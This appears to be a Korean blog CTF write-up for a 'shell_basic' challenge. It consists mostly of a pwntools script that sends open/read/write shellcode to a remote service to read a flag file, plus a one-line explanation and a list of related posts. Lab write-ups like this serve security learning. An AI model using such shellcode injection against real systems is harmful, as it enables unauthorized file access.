from pwn import *
p = remote("url", port)
context.arch = "amd64"
r = "/home/shell_basic/flag_name_is_loooooong"
shellcode = ''
shellcode += shellcraft.open(r)
shellcode += shellcraft.read('rax', 'rsp', 0x100)
shellcode += shellcraft.write(1, 'rsp', 0x100)
print(p.recv())
p.sendline(asm(shellcode))
print(p.recv())
플래그 위치는 /home/shell_basic/flag_name_is_loooooong이다. r 변수에 위치를 저장해주고 read와 write를 활용하여 shellcraft를 해준 후 익스플로잇 하면 성공.
'Layer7 > WriteUp' 카테고리의 다른 글
| x86, x64 Calling Convention 정리 (0) | 2024.08.29 |
|---|---|
| File Descriptor 개념 정리 (0) | 2024.08.29 |
| 시스템해킹 환경구축 (0) | 2024.08.13 |
| SYN Flood 정리 (0) | 2024.07.30 |
| ARP 정리 (0) | 2024.07.26 |
